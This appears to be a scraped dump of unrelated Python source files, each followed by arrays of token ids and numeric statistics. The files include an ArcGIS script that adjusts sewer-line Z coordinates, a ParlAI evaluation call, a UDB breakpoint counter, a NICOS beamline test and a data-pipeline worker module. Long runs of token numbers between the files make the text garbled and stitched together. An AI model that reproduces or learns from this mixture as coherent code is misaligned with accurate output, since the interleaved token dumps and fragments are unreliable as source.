    # while a plain truthiness test would silently ignore it and fall back
    # to the step-increment branch.
    if position is not None:
        arcpy.SetProgressorPosition(position)
    else:
        arcpy.SetProgressorPosition()
# -------------------------------------------------------------------------------------#
def copyFeature(input, output):
    """Copies a feature class to another destination.

    :param string input: The feature class to copy.
    :param string output: The destination path to copy to. If .shp is not the end of the string, it will be appended.
    """
    # Normalize the destination to a shapefile path.
    destination = output if output.endswith(".shp") else output + ".shp"
    updateProgress("Kopiere Feature {0}...".format(input))
    arcpy.CopyFeatures_management(input, destination)
def convertFeatureToPoints(featureClass):
    """**Converts a feature class to Points, creates Geometry attribute fields and adds an ID based on X/Y-coordinates.**

    *Does not overwrite the input.*

    Writes a new feature class named ``<name>_toPoints`` into the output
    folder, adds POINT_X/Y/Z fields and a ``<prefix>_XY`` field (sum of X
    and Y) used elsewhere as a coordinate-based join key.

    :param string featureClass: The feature class to convert.
    :returns: void
    """
    if featureClass[-4:] != ".shp":
        featureClass += ".shp"
    featureName = featureClass[:-4]
    feature = featureClass
    # Convert lines to points
    oldType = arcpy.Describe(feature).shapeType
    updateProgress("Konvertiere Vertices zu Punkten in {0}...".format(feature))
    # NOTE(review): relies on the module-level `output_path` assigned in the
    # setup section below — confirm this is only called after setup has run.
    createPath = output_path + "\\" + featureName + "_toPoints"  # Use featureName to write new feature
    arcpy.FeatureVerticesToPoints_management(feature, createPath, "ALL")
    # arcpy.AddMessage("{0} erfolgreich von {1} zu Point konvertiert.".format(feature, oldType))
    # Calculate Geometry Attributes
    feature = featureName + "_toPoints.shp"  # From now on, work with converted feature
    featureName = featureName + "_toPoints"
    # Add coordinate fields (ArcGIS 10.7 and up)
    updateProgress("Berechne Punkt-Koordinaten in {0}...".format(feature))
    arcpy.AddGeometryAttributes_management(feature, "POINT_X_Y_Z_M")
    arcpy.DeleteField_management(feature, "POINT_M")  # Delete, is never used
    # Following method for 10.6 and below
    # arcpy.AddField_management(featureClass, field_prefix + "_X", "DOUBLE")
    # arcpy.AddField_management(featureClass, field_prefix + "_Y", "DOUBLE")
    # arcpy.CalculateGeometryAttributes_management(featureClass, [["_X"], ["POINT_X"]])
    # arcpy.CalculateGeometryAttributes_management(featureClass, [["_Y"], ["POINT_Y"]])
    # Calculate XY-ID: the first character of the class name is used as the
    # field prefix (e.g. "h_XY" for haltungen, "a_XY" for anschluss).
    field_prefix = featureClass[0:1]
    arcpy.AddField_management(feature, field_prefix + "_XY", "DOUBLE")
    arcpy.CalculateField_management(feature, field_prefix + "_XY", "[POINT_X] + [POINT_Y]")
    updateProgress("{0} erfolgreich berechnet.".format(feature))
#-------------------------------------------------------------------------------------#
def recalculate3DPointCoordinates(feature):
    """Deletes previous POINT_* coordinates and creates new ones.

    Drops any stale POINT_X/POINT_Y/POINT_Z fields so that
    AddGeometryAttributes can rebuild them from the current geometry.

    :param string feature: The feature class to work with.
    :return: void
    """
    if feature[-4:] != ".shp":
        feature += ".shp"
    existing = [f.name for f in arcpy.ListFields(feature)]
    # Delete previous coordinate fields if they exist (one loop instead of
    # three copy-pasted stanzas; messages are identical to before).
    for coord_field in ("POINT_X", "POINT_Y", "POINT_Z"):
        if coord_field in existing:
            if showWarnings:
                arcpy.AddMessage("Warnung: Entferne Feld {0}, um es neu zu schreiben...".format(coord_field))
            arcpy.DeleteField_management(feature, coord_field)
    # Calculate new coordinates
    updateProgress("Berechne Punkt-Koordinaten in {0}...".format(feature))
    arcpy.AddGeometryAttributes_management(feature, "POINT_X_Y_Z_M")
    arcpy.DeleteField_management(feature, "POINT_M")  # Delete, is never used
def interpolateFeatureZ(featureClass, matchFieldID, referenceClass, refFieldX, refFieldY, refFieldID):
    """Interpolates the Z value of a point feature based on a reference feature. Usage: Adjust a point on a line between to other points.

    For every point, the start and end vertex of its original line are
    located, matched to reference (manhole) rows via the XY-sum key, and a
    new Z is linearly interpolated from the reference Z values by the
    point's relative distance along the line.  The POINT_Z field is then
    used to store the *adjustment delta* (not an absolute Z), which
    Adjust3DZ applies to the geometry at the end.

    :param string featureClass: The feature class to adjust.
    :param string matchFieldID: The name of the field in featureClass to match against refFieldID in referenceClass
    :param string referenceClass: The feature class to reference for start and end point.
    :param string refFieldX: The name of the field the reference X values are stored in.
    :param string refFieldY: The name of the field the reference Y values are stored in.
    :param string refFieldID: The name of the field to be matched against with matchFieldID.
    :returns: void
    """
    if featureClass[-4:] != ".shp":
        featureClass += ".shp"
    # Util variables
    saved_fid = None
    cIndex = 0
    adjustedPoints = 0
    field_prefix = featureClass[0:1]
    # Using the new data-access search cursor, because getValue() doesn't work for the old one, somehow
    fields = [f.name for f in arcpy.ListFields(featureClass)]
    refFields = [f.name for f in arcpy.ListFields(referenceClass)]
    # Find indexes for field names
    # Source feature ↓
    xIndex = fields.index("POINT_X")
    yIndex = fields.index("POINT_Y")
    zIndex = fields.index("POINT_Z")
    xyIndex = fields.index(field_prefix + "_XY")
    fidIndex = fields.index("FID")
    matchFieldIndex = fields.index(matchFieldID)
    # Reference feature ↓
    refIndexX = refFields.index(refFieldX)
    refIndexY = refFields.index(refFieldY)
    refIndexZ = refFields.index("Z")
    # NOTE(review): the reference XY key field is hard-coded here although
    # refFieldID is passed in — confirm callers always pass "schacht_XY".
    refIndexXY = refFields.index("schacht_XY")
    # Build delimited field names (can cause SQL issues if not done)
    matchFieldIDdelimited = arcpy.AddFieldDelimiters(featureClass, matchFieldID)
    FIDdelimited = arcpy.AddFieldDelimiters(featureClass, "FID")
    refFieldIDdelimited = arcpy.AddFieldDelimiters(referenceClass, refFieldID)
    # Fetch cursor into array to minimize cursor usage; rows are ordered by
    # line id then FID so all vertices of one line are contiguous.
    rows = [row for row in arcpy.da.UpdateCursor(featureClass, "*", sql_clause=(
        None, "ORDER BY {0}, {1}".format(matchFieldIDdelimited, FIDdelimited)))]
    refRows = [row for row in arcpy.da.SearchCursor(referenceClass, "*")]
    rowCount = len(rows)
    # Per-point bookkeeping used by the optional sub-interpolation pass:
    # [lengthToStart, baseLength, difToOriginal, lineID, originalZ]
    pointInfo = []
    for row in rows:
        # A repeated line id means we are still on the same line and can
        # reuse the previously found start/end references.
        if saved_fid == row[matchFieldIndex]:
            continueLine = True
        else:
            continueLine = False
            # Reset found references if line isn't continued
            startPoint = None
            endPoint = None
            startRef = None
            endRef = None
            saved_fid = row[matchFieldIndex]
        updateProgress("Verarbeite Punkt {0}/{1}... (Datenabfrage)".format(cIndex, rowCount))
        if not continueLine:
            # Get start+end points for line the current point was originally on
            for e in range(cIndex, rowCount):
                row2 = rows[e]
                if saved_fid == row2[matchFieldIndex] and not startPoint:
                    startPoint = row2
                if saved_fid == row2[matchFieldIndex] and startPoint:
                    endPoint = row2
                if startPoint and endPoint and saved_fid != row2[matchFieldIndex]:
                    break;
            if not startPoint or not endPoint:
                # No usable line endpoints: record a neutral entry and skip.
                if showWarnings:
                    arcpy.AddMessage("Warnung: Start- oder Endpunkt in Haltung von Punkt {0} nicht gefunden.".format(cIndex))
                pointInfo.insert(cIndex, [0, 0, 0, saved_fid, row[zIndex]])
                row[zIndex] = 0
                cIndex += 1
                continue
        if not continueLine:
            # Find reference points based on start and end point
            for refRow in refRows:
                if refRow[refIndexXY] == startPoint[xyIndex]:
                    startRef = refRow
                if refRow[refIndexXY] == endPoint[xyIndex]:
                    endRef = refRow
                if startRef and endRef:
                    break
            if not startRef or not endRef:
                if showWarnings:
                    arcpy.AddMessage("Warnung: Start- oder Endpunkt in Referenz von Punkt {0} nicht gefunden.".format(cIndex))
                pointInfo.insert(cIndex, [0, 0, 0, saved_fid, row[zIndex]])
                row[zIndex] = 0
                cIndex += 1
                continue
        updateProgress("Verarbeite Punkt {0}/{1}... (Berechnung)".format(cIndex, rowCount))
        if not continueLine:
            # Calculate base values (squared line length, computed once per line)
            xLength = startRef[refIndexX] - endRef[refIndexX]
            yLength = startRef[refIndexY] - endRef[refIndexY]
            baseLength = (xLength ** 2) + (yLength ** 2)
        # Calculate distance from start and end point
        xLength = row[xIndex] - startRef[refIndexX]
        yLength = row[yIndex] - startRef[refIndexY]
        toStartLength = (xLength ** 2) + (yLength ** 2)
        # Calculate Z-values
        startZ = startRef[refIndexZ]
        endZ = endRef[refIndexZ]
        zDif = startZ - endZ  # Can be negative and should be able to
        distanceFactor = math.sqrt((toStartLength / baseLength))
        newZ = startZ - (distanceFactor * zDif)  # Calculate new Z coord based on distance to start point
        difToOriginal = newZ - row[zIndex]
        if difToOriginal <= .2:
            difToOriginal = 0  # Prevents pulling lines downwards + keeps already specific data in shape
        pointInfo.insert(cIndex, [math.sqrt(toStartLength), math.sqrt(baseLength), difToOriginal, saved_fid, row[zIndex]])
        row[zIndex] = difToOriginal
        adjustedPoints += 1
        cIndex += 1
    if subInterpolate:
        # Interpolation within lines, taking non-adjusted points as reference
        updateProgress("Sub-Interpolation...")
        cIndex = 0
        for row in rows:
            updateProgress("Verarbeite Punkt {0}/{1}...".format(cIndex, rowCount))
            if row[zIndex] == 0:
                cIndex += 1
                continue
            toStartLength = pointInfo[cIndex][0]
            baseLength = pointInfo[cIndex][1]
            difToOriginal = pointInfo[cIndex][2]
            lineID = pointInfo[cIndex][3]
            originalZ = pointInfo[cIndex][4]
            # Find previous and next non-adjusted point within line
            sIndex = cIndex
            while sIndex > 0 and lineID == pointInfo[sIndex][3] and pointInfo[sIndex][2] != 0:
                sIndex -= 1
            eIndex = cIndex
            while eIndex < len(pointInfo) and lineID == pointInfo[eIndex][3] and pointInfo[eIndex][2] != 0:
                eIndex += 1
            # Only sub-interpolate when points have been found
            if sIndex != cIndex and eIndex != cIndex:
                # Create new reference data from the two bracketing
                # non-adjusted points of the same line.
                zDif = pointInfo[eIndex][4] - pointInfo[sIndex][4]
                baseLength = pointInfo[eIndex][0] - pointInfo[sIndex][0]
                toStartLength = pointInfo[cIndex][0] - pointInfo[sIndex][0]
                if toStartLength > 0 and baseLength > 0:
                    distanceFactor = toStartLength / baseLength
                    newZ = pointInfo[sIndex][4] - (distanceFactor * zDif)  # Calculate new Z coord based on distance to start point
                    difToOriginal = newZ - (pointInfo[cIndex][4] + row[zIndex])
                    row[zIndex] += difToOriginal
                    adjustedPoints += 1
            cIndex += 1
    # Write the computed deltas back through a fresh cursor, using the same
    # ordering so rows[] and cursor rows stay aligned by index.
    updateProgress("Schreibe interpolierte Punkte in Feature...")
    rIndex = 0
    with arcpy.da.UpdateCursor(featureClass, fields, sql_clause=(None, "ORDER BY {0}, {1}".format(matchFieldIDdelimited, FIDdelimited))) as cursor:
        for row in cursor:
            row[zIndex] = rows[rIndex][zIndex]
            cursor.updateRow(row)
            rIndex += 1
    updateProgress("Passe Geometrie auf Tabellenwerte an...")
    # Apply the POINT_Z deltas to the actual geometry.
    arcpy.Adjust3DZ_management(featureClass, "NO_REVERSE", "POINT_Z")
    updateProgress("Alle Punkte in {0} erfolgreich interpoliert!".format(featureClass))
# -------------------------------------------------------------------------------------#
def adjust3DZbyReference(featureA, matchA, groupA, featureB, matchB):
    """Takes Z values from featureB and transfers them to featureA where matchA = matchB.

    Assumes the input feature contains 3D points.
    Group parameter is currently ignored.

    POINT_Z in featureA is used to store an *adjustment delta* relative to
    the original Z (kept in a deep copy), which Adjust3DZ applies to the
    geometry at the end.  After a direct match is found, connected points
    of the same line and XY-overlapping points of secondary lines are
    snapped in cascading passes.

    :param string featureA: The feature class to adjust.
    :param string matchA: The name of the field in featureClass to match against matchB in featureB.
    :param string groupA: The field to group featureA by.
    :param string featureB: The feature class to reference.
    :param string matchB: The name of the field to be matched against with matchA.
    :returns: void
    """
    if featureA[-4:] != ".shp":
        featureA += ".shp"
    if featureB[-4:] != ".shp":
        featureB += ".shp"
    updateProgress("Passe 3D-Positionen von {0} an...".format(featureA))
    # Fetch all fields of features to reference later
    Afields = [f.name for f in arcpy.ListFields(featureA)]
    Bfields = [f.name for f in arcpy.ListFields(featureB)]
    # Find indexes for field names
    AmatchIndex = Afields.index(matchA)
    BmatchIndex = Bfields.index(matchB)
    AzIndex = Afields.index("POINT_Z")
    BzIndex = Bfields.index("POINT_Z")
    AgroupIndex = Afields.index(groupA)
    # Fetch cursor into array to minimize cursor usage; ordering must match
    # the write-back cursor at the bottom so indexes stay aligned.
    Arows = [row for row in arcpy.da.UpdateCursor(featureA, "*", sql_clause=(
        None, "ORDER BY {0}, {1} DESC".format(groupA, "FID")))]
    Brows = [row for row in arcpy.da.SearchCursor(featureB, "*")]
    ArowCount = len(Arows)
    # Util variables
    cIndex = 0
    adjustedPoints = 0
    processGroups = True  # Should create a 2D plane of points per line
    xyTolerance = .003  # in meters
    updateProgress("Suche nach übereinstimmenden IDs von {0}...".format(featureA))
    # Keep the original (unmodified) rows so deltas can be computed later.
    OArows = copy.deepcopy(Arows)  # Fastest method to deepcopy array according to https://stackoverflow.com/a/2612990/13756552
    for Arow in Arows:
        # Set to 0 as default, does not change position
        Arow[AzIndex] = 0
    for Arow in Arows:
        updateProgress("Verarbeite Punkt {0}/{1}...".format(cIndex, ArowCount))
        # Only search for match if point isn't adjusted already
        #if Arow[AzIndex] == 0:
        # Search for matching reference points
        searchID = Arow[AmatchIndex]
        adjusted = False
        for Brow in Brows:
            if searchID == Brow[BmatchIndex]:
                # Copy the adjustment (NOT the absolute) Z value
                Arow[AzIndex] = Brow[BzIndex] - OArows[cIndex][AzIndex]
                adjustedPoints += 1
                adjusted = True
                break
        if adjusted:
            adjusted = False
            # Find connected points, snap overlap in XY to base sewage
            rIndex = 0
            for Arow2 in Arows:
                if Arow2[AgroupIndex] == Arow[AgroupIndex] and not rIndex == cIndex:
                    if (Arow2[AmatchIndex] > Arow[AmatchIndex] - xyTolerance) and (
                            Arow2[AmatchIndex] < Arow[AmatchIndex] + xyTolerance):
                        # XY-overlapping point of the same group: inherit the
                        # adjusted Z of the primary point.
                        adjustedPoints += 1
                        difToOriginal = (OArows[cIndex][AzIndex] + Arow[AzIndex]) - OArows[rIndex][AzIndex]
                        Arow2[AzIndex] = difToOriginal
                    else:
                        # Other point of the same group: take the reference Z.
                        adjustedPoints += 1
                        difToOriginal = Brow[BzIndex] - OArows[rIndex][AzIndex]
                        if difToOriginal <= .2: difToOriginal = 0
                        Arow2[AzIndex] = difToOriginal
                    # Snap all secondary lines to connected primary by XY proximity
                    sIndex = 0
                    for Arow3 in Arows:
                        if (not sIndex == rIndex) and (not sIndex == cIndex) and Arows[sIndex][AzIndex] == 0:
                            if (Arow3[AmatchIndex] > Arow2[AmatchIndex] - xyTolerance) and (
                                    Arow3[AmatchIndex] < Arow2[AmatchIndex] + xyTolerance):
                                adjustedPoints += 1
                                difToOriginal = (OArows[rIndex][AzIndex] + Arow2[AzIndex]) - OArows[sIndex][
                                    AzIndex]
                                if difToOriginal <= .2: difToOriginal = 0
                                Arow3[AzIndex] = difToOriginal
                                # Find points of same group for secondary lines
                                fIndex = 0
                                for Arow4 in Arows:
                                    if Arow4[AgroupIndex] == Arow3[AgroupIndex] and not fIndex == sIndex and not fIndex == cIndex and not fIndex == rIndex:
                                        adjustedPoints += 1
                                        difToOriginal = (OArows[sIndex][AzIndex] + Arow3[AzIndex]) - \
                                                        OArows[fIndex][AzIndex]
                                        if difToOriginal <= .2: difToOriginal = 0
                                        Arow4[AzIndex] = difToOriginal
                                    fIndex += 1
                        sIndex += 1
                rIndex += 1
        cIndex += 1
    updateProgress("Schreibe {0} angepasste Punkte in Feature {1}...".format(adjustedPoints, featureA))
    # Write deltas back through a fresh cursor with identical ordering.
    rIndex = 0
    with arcpy.da.UpdateCursor(featureA, Afields, sql_clause=(
            None, "ORDER BY {0}, {1} DESC".format(groupA, "FID"))) as Aupdate:
        for AupRow in Aupdate:
            if Arows[rIndex][AzIndex] == 0:
                # Aupdate.deleteRow()
                AupRow[AzIndex] = Arows[rIndex][AzIndex]
                Aupdate.updateRow(AupRow)
            else:
                AupRow[AzIndex] = Arows[rIndex][AzIndex]
                Aupdate.updateRow(AupRow)
            rIndex += 1
    updateProgress("Passe Geometrie von {0} auf Tabellenwerte an...".format(featureA))
    # Apply the POINT_Z deltas to the actual geometry.
    arcpy.Adjust3DZ_management(featureA, "NO_REVERSE", "POINT_Z")
    updateProgress("{0} Punkte in {1} erfolgreich angepasst!".format(adjustedPoints, featureA))
# -------------------------------------------------------------------------------------#
with Timer("Setup") as timer:
    # NOTE(review): `Timer` is not defined in this excerpt — presumably a
    # context manager defined earlier in the file; confirm it exists.
    # Initiate arcpy progressor (7 steps overall).
    arcpy.SetProgressor("step", "...", 0, 7)
    updateProgress("Starte Prozess...")
    # Get parameters (order must match the tool's parameter definition).
    haltung_path = arcpy.GetParameterAsText(0)    # sewer lines (Haltungen)
    anschluss_path = arcpy.GetParameterAsText(1)  # house connections
    schacht_path = arcpy.GetParameterAsText(2)    # manually 3D-adjusted manholes
    output_path = arcpy.GetParameterAsText(3)     # output folder (should be empty)
    showWarnings = arcpy.GetParameter(4)
    subInterpolate = arcpy.GetParameter(5)
    # Change workspace to output folder
    os.chdir(output_path)
    arcpy.env.workspace = output_path
    env.overwriteOutput = True
    # Copy features to output folder so the original data stays untouched.
    haltung_out = "haltungen_out.shp"
    anschluss_out = "anschluss_out.shp"
    schacht_out = "schacht_out.shp"
    copyFeature(haltung_path, haltung_out)
    copyFeature(anschluss_path, anschluss_out)
    copyFeature(schacht_path, schacht_out)
    # logFeatureClasses('w') # Can be used to check if features have been copied correctly
# logFeatureClasses('w') # Can be used to check if features have been copied correctly
with Timer("Zu Punkte konvertieren") as timer:
    # Convert the two copied line features to per-vertex point features.
    featureClasses = arcpy.ListFeatureClasses()
    for featureClass in featureClasses:
        if featureClass == anschluss_out or featureClass == haltung_out:
            convertFeatureToPoints(featureClass)
# Update base line vertices Z values using the adjusted manhole inverts.
with Timer("3D Daten anpassen (Haltungen)") as timer:
    interpolateFeatureZ("haltungen_out_toPoints", "ORIG_FID", schacht_out, "schacht_X", "schacht_Y", "schacht_XY")
    recalculate3DPointCoordinates("haltungen_out_toPoints")
# Transfer the adjusted Z values from the sewer points to house-connection
# points that share the same XY key.
with Timer("3D Daten anpassen (Anschlussdaten)") as timer:
    adjust3DZbyReference("anschluss_out_toPoints", "a_XY", "ORIG_FID", "haltungen_out_toPoints", "h_XY")
    # recalculate3DPointCoordinates("anschluss_out_toPoints")
# Rebuild line features from the adjusted point sets.
with Timer("Zu Linien konvertieren") as timer:
    updateProgress("Wandle anschluss_out_toPoints in Linien um...")
    arcpy.PointsToLine_management("anschluss_out_toPoints.shp", "anschluss_out_lines.shp", "ORIG_FID", "ORIG_FID")
    updateProgress("Wandle haltungen_out_toPoints in Linien um...")
    arcpy.PointsToLine_management("haltungen_out_toPoints.shp", "haltungen_out_lines.shp", "ORIG_FID", "ORIG_FID")
arcpy.AddMessage("Skript erfolgreich beendet und alle Daten verarbeitet!")
2,
10173,
38,
1797,
3661,
1968,
198,
2,
198,
2,
1168,
732,
694,
25,
198,
2,
1052,
6603,
268,
18042,
367,
2501,
2150,
82,
12,
3318,
367,
8717,
504,
354,
75,
1046,
19608,
268,
285,
342,
346,
5036,
18042,
3059,
19725,
568,
71,
11925,... | 2.336097 | 9,890 |
import pytest
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
@pytest.fixture
| [
11748,
12972,
9288,
198,
6738,
384,
11925,
1505,
1330,
3992,
26230,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11284,
13,
17077,
1330,
5313,
32103,
21321,
198,
198,
31,
9078,
9288,
13,
69,
9602,
628,
628,
628
] | 3.289474 | 38 |
from parlai.scripts.eval_model import EvalModel
# Evaluate the fine-tuned customer-care model on 200 examples, reporting
# perplexity, F1, accuracy and hits@1.  The commented-out keyword arguments
# below are alternative configurations kept for quick switching.
EvalModel.main(
    task='customer_Care',
    # Path to the locally trained checkpoint to evaluate.
    model_file='/home/xcs224u/project/Task-Oriented-Chatbot-With-Empathy/data/test_models/pretrained_transformer__ed_cc/model',
    metrics = ['ppl','f1','accuracy','hits@1'],
    # model_file='zoo:bert/model',
    # fp16 = False,
    num_examples=200,
    # optimizer='adam',
)
6738,
1582,
75,
1872,
13,
46521,
13,
18206,
62,
19849,
1330,
26439,
17633,
220,
198,
36,
2100,
17633,
13,
12417,
7,
198,
220,
220,
220,
4876,
11639,
23144,
263,
62,
17784,
3256,
198,
220,
220,
220,
2746,
62,
7753,
11639,
14,
11195,
... | 2.339623 | 159 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 17 13:34:41 2018
"""
import requests
import json
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
30030,
5979,
1596,
1511,
25,
2682,
25,
3901,
2864,
198,
198,
37811,
198,
198,
11748,
7007,
... | 2.489796 | 49 |
import gdb
from undodb.debugger_extensions import udb
def count_calls(func_name):
    """
    Counts how many times func_name is hit during the replay of the currently
    loaded recording and returns the hit count.
    """
    # Plant a breakpoint on the requested function; GDB bumps its hit
    # counter every time execution stops there.
    breakpoint_for_func = gdb.Breakpoint(func_name)

    # Replay forward until we reach the end of the recorded history,
    # resuming after every breakpoint stop along the way.
    last_bbcount = udb.get_event_log_extent().max_bbcount
    while udb.time.get().bbcount < last_bbcount:
        gdb.execute("continue")

    return breakpoint_for_func.hit_count
# UDB will automatically load the modules passed to UdbLauncher.add_extension
# and, if present, automatically execute any function (with no arguments) called
# "run".
| [
11748,
308,
9945,
198,
198,
6738,
3318,
375,
65,
13,
24442,
1362,
62,
2302,
5736,
1330,
334,
9945,
628,
198,
4299,
954,
62,
66,
5691,
7,
20786,
62,
3672,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
2764,
82,
703,
867,
166... | 3.067729 | 251 |
# pylint: skip-file
# test: subdirs = frm2
# test: setups = pgaa
# test: setupcode = SetDetectors(det)
# typical PGAA application
from nicos import session
loaded_setups = session.loaded_setups
if 'pgaa' in loaded_setups:
    printwarning('Execute PGAA specific tests')
    # Query the current state of the sample devices.  The argument 0 is
    # presumably maxage=0 (force a fresh hardware read) — confirm against
    # the NICOS device API.
    sample_motor.status(0)
    samplepos.status(0)
    # Open the shutter and read its state back through both interfaces.
    maw(shutter, 'open')
    read(shutter)
    shutter.read(0)
    # Drive the sample motor and the sample changer through six positions.
    # NOTE(review): `sample_pos` here vs `samplepos` above — confirm both
    # names refer to intended (possibly distinct) devices.
    scan(sample_motor, [4, 74, 144, 214, 284, 354])
    scan(sample_pos, [0, 1, 2, 3, 4, 5])
    maw(shutter, 'closed')
| [
2,
279,
2645,
600,
25,
14267,
12,
7753,
198,
198,
2,
1332,
25,
850,
15908,
82,
796,
1216,
76,
17,
198,
2,
1332,
25,
44266,
796,
279,
4908,
64,
198,
2,
1332,
25,
9058,
8189,
796,
5345,
47504,
669,
7,
15255,
8,
198,
198,
2,
7226... | 2.378505 | 214 |
#!/usr/bin/env python
# -*- coding: utf-8
from distutils.version import StrictVersion
from .common import has_utility, MacDriver
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
198,
6738,
1233,
26791,
13,
9641,
1330,
520,
2012,
14815,
198,
198,
6738,
764,
11321,
1330,
468,
62,
315,
879,
11,
4100,
32103,
628
] | 3.046512 | 43 |
"""
Distributed under the terms of the BSD 3-Clause License.
The full license is in the file LICENSE, distributed with this software.
Author: Jun Zhu <jun.zhu@xfel.eu>
Copyright (C) European X-Ray Free-Electron Laser Facility GmbH.
All rights reserved.
"""
import multiprocessing as mp
from threading import Event
from queue import Empty, Full
import sys
import traceback
import time
from .exceptions import StopPipelineError, ProcessingError
from .f_pipe import KaraboBridge, MpInQueue, MpOutQueue, ZmqOutQueue
from .processors import (
DigitizerProcessor,
AzimuthalIntegProcessorPulse, AzimuthalIntegProcessorTrain,
BinningProcessor,
CorrelationProcessor,
CtrlDataProcessor,
FomPulseFilter, FomTrainFilter,
HistogramProcessor,
ImageProcessor,
ImageRoiPulse, ImageRoiTrain,
ImageTransformProcessor,
PumpProbeProcessor,
XgmProcessor,
)
from ..config import config, PipelineSlowPolicy, ExtensionType
from ..ipc import RedisConnection
from ..ipc import process_logger as logger
from ..processes import register_foam_process
from ..database import Metadata as mt
from ..database import MetaProxy, MonProxy
class ProcessWorker(mp.Process):
"""Base worker class for heavy online data analysis."""
_db = RedisConnection()
@property
@property
@property
def run(self):
    """Override.

    Main worker loop: pull a datum from the input pipe, run all processor
    tasks on it, then forward it to the output pipe and any extensions.
    Exits when the close event is set.
    """
    # start input and output pipes
    self._input.start()
    self._output.start()
    if self._extension is not None:
        self._extension.start()
    if self._detector_extension is not None:
        self._detector_extension.start()
    data_out = None
    while not self.closing:
        if not self.running:
            # Paused: drop any pending datum and block until resumed.
            data_out = None
            self.wait()
            self.notify_update()
        if data_out is None:
            try:
                # get the data from pipe-in
                data_out = self._input.get()
                try:
                    self._run_tasks(data_out)
                except StopPipelineError:
                    # The train was rejected by a processor: record the
                    # drop and discard the datum.
                    tid = data_out["processed"].tid
                    self._mon.add_tid_with_timestamp(
                        tid, n_pulses=0, dropped=True)
                    logger.info(f"Train {tid} dropped!")
                    if data_out.get("reset_ma", False):
                        self._meta.hset(mt.GLOBAL_PROC, "reset_ma", 1)
                    data_out = None
            except Empty:
                pass
        if data_out is not None:
            sent = False
            # TODO: still put the data but signal the data has been dropped.
            if self._slow_policy == PipelineSlowPolicy.WAIT:
                # WAIT policy: retry the same datum next iteration if the
                # output queue is full.
                try:
                    self._output.put(data_out)
                    sent = True
                except Full:
                    pass
            else:
                # always keep the latest data in the cache
                self._output.put_pop(data_out)
                sent = True
            # Extensions are best-effort: a full extension queue never
            # blocks the main pipeline.
            if self._extension is not None and sent:
                try:
                    self._extension.put(data_out)
                except Full:
                    pass
            if self._detector_extension is not None and sent:
                # Repackage the masked-mean detector image in a
                # Karabo-bridge-like dict for external consumers.
                processed = data_out["processed"]
                detector, key = data_out["catalog"].main_detector.split()
                now = time.time()
                bridge_data = {
                    f"EF_{detector}" : {
                        key: processed.image.masked_mean,
                        "metadata": {
                            "timestamp": now,
                            "timestamp.sec": int(now),
                            "timestamp.frac": 0,
                            "timestamp.tid": processed.tid
                        } } }
                try:
                    self._detector_extension.put(bridge_data)
                except Full:
                    pass
            if sent:
                data_out = None
        time.sleep(0.001)
def _run_tasks(self, data):
    """Run all tasks for once:

    :param dict data: a dictionary which is passed around processors.

    :raises StopPipelineError: re-raised so the caller can drop the train.
    """
    def _log(e, prefix=""):
        # Full traceback at debug level, short message at error level
        # (shared by all three handlers below to avoid duplication).
        _, _, exc_traceback = sys.exc_info()
        logger.debug(prefix + repr(traceback.format_tb(exc_traceback)) + repr(e))
        logger.error(repr(e))

    for task in self._tasks:
        try:
            task.run_once(data)
        except StopPipelineError as e:
            # Fatal for this train: log and propagate to the caller.
            _log(e)
            raise
        except ProcessingError as e:
            # Recoverable: log and continue with the remaining tasks.
            _log(e)
        except Exception as e:
            # Defensive catch-all so one broken processor cannot kill
            # the worker process.
            _log(e, prefix="Unexpected Exception!: ")
@property
@property
class PulseWorker(ProcessWorker):
    """Pipeline worker for pulse-resolved data."""

    def __init__(self, pause_ev, close_ev):
        """Initialization.

        :param pause_ev: event used to pause/resume the worker.
        :param close_ev: event used to shut the worker down.
        """
        super().__init__('pulse worker', pause_ev, close_ev)

        # Input comes directly from the Karabo bridge; output feeds the
        # train worker via an inter-process queue.
        self._input = KaraboBridge(self._input_update_ev, pause_ev, close_ev)
        self._output = MpOutQueue(self._output_update_ev, pause_ev, close_ev)

        # Processor order is significant: control/slow data first, then
        # image assembly, ROI, azimuthal integration, pulse filtering,
        # pump-probe and the final image transform.
        self._set_processors([
            ('xgm_proc', XgmProcessor),
            ('digitizer_proc', DigitizerProcessor),
            ('ctrl_data_proc', CtrlDataProcessor),
            ('image_proc', ImageProcessor),
            ('image_roi', ImageRoiPulse),
            ('ai_proc', AzimuthalIntegProcessorPulse),
            ('filter', FomPulseFilter),
            ('pp_proc', PumpProbeProcessor),
            ('image_transform_proc', ImageTransformProcessor)
        ])
class TrainWorker(ProcessWorker):
    """Pipeline worker for train-resolved data."""

    def __init__(self, pause_ev, close_ev):
        """Initialization.

        :param pause_ev: event used to pause/resume the worker.
        :param close_ev: event used to shut the worker down.
        """
        super().__init__('train worker', pause_ev, close_ev)

        # Input comes from the pulse worker; this is the final stage, so
        # the output queue is flagged accordingly.
        self._input = MpInQueue(self._input_update_ev, pause_ev, close_ev)
        self._output = MpOutQueue(self._output_update_ev, pause_ev, close_ev,
                                  final=True)

        # ZMQ extensions republish results to external consumers: one for
        # all processed output, one for the main detector image only.
        self._extension = ZmqOutQueue(ExtensionType.ALL_OUTPUT,
                                      self._extension_update_ev,
                                      pause_ev, close_ev)
        self._detector_extension = ZmqOutQueue(ExtensionType.DETECTOR_OUTPUT,
                                               self._extension_update_ev,
                                               pause_ev, close_ev)

        # Processor order is significant: ROI and integration precede the
        # train filter, statistics and correlation/binning analysis.
        self._set_processors([
            ('image_roi', ImageRoiTrain),
            ('ai_proc', AzimuthalIntegProcessorTrain),
            ('filter', FomTrainFilter),
            ('histogram', HistogramProcessor),
            ('correlation1_proc', CorrelationProcessor, (1,)),
            ('correlation2_proc', CorrelationProcessor, (2,)),
            ('binning_proc', BinningProcessor)
        ])
| [
37811,
198,
20344,
6169,
739,
262,
2846,
286,
262,
347,
10305,
513,
12,
2601,
682,
13789,
13,
198,
198,
464,
1336,
5964,
318,
287,
262,
2393,
38559,
24290,
11,
9387,
351,
428,
3788,
13,
198,
198,
13838,
25,
7653,
33144,
1279,
29741,
... | 1.90774 | 3,902 |
"""
Test PCA_with_scaling
